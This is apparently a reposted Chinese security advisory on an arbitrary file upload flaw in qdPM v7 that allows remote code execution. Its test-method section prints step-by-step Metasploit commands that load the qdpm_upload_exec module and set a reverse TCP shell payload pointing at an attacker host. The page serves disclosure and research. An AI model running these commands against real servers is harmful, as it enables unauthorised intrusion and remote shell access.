发布日期:2012-09-25
更新日期:2012-11-05受影响系统:
qdpm qdpm 7
qdpm qdpm
描述:
--------------------------------------------------------------------------------
qdPM是免费的开源的基于Web的项目管理工具。
qdPM v7的用户配置文件的照片上传功能可被利用上传任意文件到受害者服务器,导致远程代码执行。
<*来源:qdPM v7
链接:http://www.metasploit.com/modules/exploit/multi/http/qdpm_upload_exec
http://www.osvdb.org/82978
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/multi/http/qdpm_upload_exec
msf exploit(qdpm_upload_exec) > show payloads
msf exploit(qdpm_upload_exec) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(qdpm_upload_exec) > set LHOST [MY IP ADDRESS]
msf exploit(qdpm_upload_exec) > set PASSWORD [STRING]
msf exploit(qdpm_upload_exec) > set RHOST [TARGET IP]
msf exploit(qdpm_upload_exec) > set USERNAME [STRING]
msf exploit(qdpm_upload_exec) > exploit建议:
--------------------------------------------------------------------------------
厂商补丁:
qdpm
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://qdpm.net/Auxilium RateMyPet任意文件上传漏洞VBulletin ChangUonDyU - Advanced Statistics SQL注入漏洞相关资讯 qdPM安全漏洞 qdPM 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
| <
|
易网时代-编程资源站